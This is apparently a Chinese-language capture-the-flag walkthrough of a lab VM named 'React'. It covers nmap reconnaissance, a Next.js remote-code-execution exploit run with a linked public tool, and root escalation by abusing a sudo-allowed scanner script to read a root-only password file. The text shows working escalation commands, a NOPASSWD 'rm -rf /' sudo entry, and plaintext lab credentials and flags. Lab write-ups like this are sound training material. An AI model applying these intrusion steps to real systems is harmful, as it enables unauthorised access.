React

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 15:15 CST
Nmap scan report for 192.168.2.1
Host is up (0.00068s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00031s latency).
MAC Address: 08:00:27:59:EA:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.27
Host is up (0.00062s latency).
MAC Address: 08:00:27:40:AA:43 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.18 seconds

靶机IP：192.168.2.27

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 15:15 CST
Nmap scan report for 192.168.2.27
Host is up (0.00066s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:40:AA:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds

开放端口：22、80、3000

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 15:16 CST
Nmap scan report for 192.168.2.27
Host is up (0.00054s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\xBD\x91\xE7\xBB\x9C\xE8\xAF\x8A\xE6\x96\xAD\xE5\xB7\xA5\xE5\x85\xB7
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
|     x-nextjs-cache: HIT
|     x-nextjs-prerender: 1
|     x-nextjs-stale-time: 4294967294
|     X-Powered-By: Next.js
|     Cache-Control: s-maxage=31536000, 
|     ETag: "vhwrqricd17bt"
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 9497
|     Date: Tue, 16 Dec 2025 07:16:30 GMT
|     Connection: close
|     <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="image" href="/next.svg"/><link rel="stylesheet" href="/_next/static/css/97f208c543225968.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-744ee3f145013e34.js"/><script src="/_next/static/chunks/4bd1b696-6985518451956beb.js" async=""></script><script src="/_next/static/chunks/215-
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch
|     Allow: GET
|     Allow: HEAD
|     Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
|     Date: Tue, 16 Dec 2025 07:16:30 GMT
|     Connection: close
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=12/16%Time=6941074F%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,26A9,"HTTP/1\.1\x20200\x20OK\r\nVary:\x20RSC,\x20Next-Rout
SF:er-State-Tree,\x20Next-Router-Prefetch,\x20Next-Router-Segment-Prefetch
SF:,\x20Accept-Encoding\r\nx-nextjs-cache:\x20HIT\r\nx-nextjs-prerender:\x
SF:201\r\nx-nextjs-stale-time:\x204294967294\r\nX-Powered-By:\x20Next\.js\
SF:r\nCache-Control:\x20s-maxage=31536000,\x20\r\nETag:\x20\"vhwrqricd17bt
SF:\"\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x
SF:209497\r\nDate:\x20Tue,\x2016\x20Dec\x202025\x2007:16:30\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><head><m
SF:eta\x20charSet=\"utf-8\"/><meta\x20name=\"viewport\"\x20content=\"width
SF:=device-width,\x20initial-scale=1\"/><link\x20rel=\"preload\"\x20as=\"i
SF:mage\"\x20href=\"/next\.svg\"/><link\x20rel=\"stylesheet\"\x20href=\"/_
SF:next/static/css/97f208c543225968\.css\"\x20data-precedence=\"next\"/><l
SF:ink\x20rel=\"preload\"\x20as=\"script\"\x20fetchPriority=\"low\"\x20hre
SF:f=\"/_next/static/chunks/webpack-744ee3f145013e34\.js\"/><script\x20src
SF:=\"/_next/static/chunks/4bd1b696-6985518451956beb\.js\"\x20async=\"\"><
SF:/script><script\x20src=\"/_next/static/chunks/215-")%r(Help,2F,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(NCP,2F,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r
SF:(HTTPOptions,10C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nvary:\x20RSC,\x
SF:20Next-Router-State-Tree,\x20Next-Router-Prefetch,\x20Next-Router-Segme
SF:nt-Prefetch\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nCache-Control:\x20pri
SF:vate,\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nDat
SF:e:\x20Tue,\x2016\x20Dec\x202025\x2007:16:30\x20GMT\r\nConnection:\x20cl
SF:ose\r\n\r\n")%r(RTSPRequest,10C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:vary:\x20RSC,\x20Next-Router-State-Tree,\x20Next-Router-Prefetch,\x20Ne
SF:xt-Router-Segment-Prefetch\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nCache-
SF:Control:\x20private,\x20no-cache,\x20no-store,\x20max-age=0,\x20must-re
SF:validate\r\nDate:\x20Tue,\x2016\x20Dec\x202025\x2007:16:30\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n");
MAC Address: 08:00:27:40:AA:43 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds

1. 22端口： ssh服务
2. 80端口： http服务
3. 3000端口： next.js服务

二、Next.js漏洞利用

使用工具直接梭哈，
Next.js利用工具： https://github.com/Rsatan/Next.js-Exploit-Tool

直接反弹shell

三、获取bot权限

获取到shell

bot@React:/opt/target$ id
uid=1000(bot) gid=1000(bot) groups=1000(bot)

四、权限提升

查看到bot用户密码，/opt/target/start.sh，lMmqr98vg3Ke1Mu4hJwN

使用ssh进行连接，提示Host key verification failed

┌──(root㉿kali)-[~]
└─# ssh bot@192.168.2.27  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ED25519 key sent by the remote host is
SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ED25519 key in /root/.ssh/known_hosts:4
  remove with:
  ssh-keygen -f '/root/.ssh/known_hosts' -R '192.168.2.27'
Host key for 192.168.2.27 has changed and you have requested strict checking.
Host key verification failed.

使用ssh-keygen移除

┌──(root㉿kali)-[~]
└─# ssh-keygen -R 192.168.2.27  
# Host 192.168.2.27 found: line 4
/root/.ssh/known_hosts updated.
Original contents retained as /root/.ssh/known_hosts.old

重新进行连接

┌──(root㉿kali)-[~]
└─# ssh bot@192.168.2.27      
The authenticity of host '192.168.2.27 (192.168.2.27)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:4: [hashed name]
    ~/.ssh/known_hosts:6: [hashed name]
    ~/.ssh/known_hosts:7: [hashed name]
    ~/.ssh/known_hosts:12: [hashed name]
    ~/.ssh/known_hosts:13: [hashed name]
    ~/.ssh/known_hosts:14: [hashed name]
    ~/.ssh/known_hosts:15: [hashed name]
    ~/.ssh/known_hosts:16: [hashed name]
    (20 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.27' (ED25519) to the list of known hosts.
bot@192.168.2.27's password: 
Linux React 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bot@React:~$ 

查看sudo -l

bot@React:/opt/target$ sudo -l
Matching Defaults entries for bot on React:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bot may run the following commands on React:
    (ALL) NOPASSWD: /opt/react2shell/scanner.py
    (ALL) NOPASSWD: /usr/bin/rm -rf /

查看scanner.py的使用方法

bot@React:~$ sudo /opt/react2shell/scanner.py -h
usage: scanner.py [-h] (-u URL | -l LIST) [-t THREADS] [--timeout TIMEOUT] [-o OUTPUT] [--all-results] [-k] [-H HEADER] [-v] [-q]
      [--no-color] [--safe-check] [--windows] [--waf-bypass] [--waf-bypass-size KB]

React2Shell Scanner

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL/host to check
  -l LIST, --list LIST  File containing list of hosts (one per line)
  -t THREADS, --threads THREADS
   Number of concurrent threads (default: 10)
  --timeout TIMEOUT     Request timeout in seconds (default: 10)
  -o OUTPUT, --output OUTPUT
  Output file for results (JSON format)
  --all-results         Save all results to output file, not just vulnerable hosts
  -k, --insecure        Disable SSL certificate verification
  -H HEADER, --header HEADER
   Custom header in 'Key: Value' format (can be used multiple times)
  -v, --verbose         Verbose output (show response snippets for vulnerable hosts)
  -q, --quiet           Quiet mode (only show vulnerable hosts)
  --no-color            Disable colored output
  --safe-check          Use safe side-channel detection instead of RCE PoC
  --windows             Use Windows PowerShell payload instead of Unix shell
  --waf-bypass          Add junk data to bypass WAF content inspection (default: 128KB)
  --waf-bypass-size KB  Size of junk data in KB for WAF bypass (default: 128)

Examples:
  scanner.py -u https://example.com
  scanner.py -l hosts.txt -t 20 -o results.json
  scanner.py -l hosts.txt --threads 50 --timeout 15
  scanner.py -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

参数-l可以读取文件，参数-o保存输出，参数--all-results可以保存所有内容

找到一个敏感二进制文件/usr/bin/check_key

bot@React:~$ strings /usr/bin/check_key
....
cp /root/Reactrootpass.txt /opt
....

发现存在一个文件/root/Reactrootpass.txt，直接读取

bot@React:/opt$ sudo /opt/react2shell/scanner.py -l /root/Reactrootpass.txt -o /tmp/3.txt --all-results

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[ERROR] To75CuOTHLA7BMmH5Puv - Connection Error: HTTPSConnectionPool(host='to75cuothla7bmmh5puv', port=443): Max retries exceeded with url: / (Caused by NameResolutionError("HTTPSConnection(host='to75cuothla7bmmh5puv', port=443): Failed to resolve 'to75cuothla7bmmh5puv' ([Errno -3] Temporary failure in name resolution)"))

============================================================
SCAN SUMMARY
============================================================
  Total hosts scanned: 1
  Vulnerable: 0
  Not vulnerable: 1
  Errors: 0
============================================================

[+] Results saved to: /tmp/3.txt

获得一个字符串To75CuOTHLA7BMmH5Puv

直接登录root

bot@React:/opt$ su root
Password: 
root@React:/opt# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

root@React:/opt# cat /root/root.txt /home/bot/user.txt 
flag{root-bc29a7159b63b18dc294002be32e1c22}
flag{user-4bb58d8876c0423d7f759a4d2dfa9cac}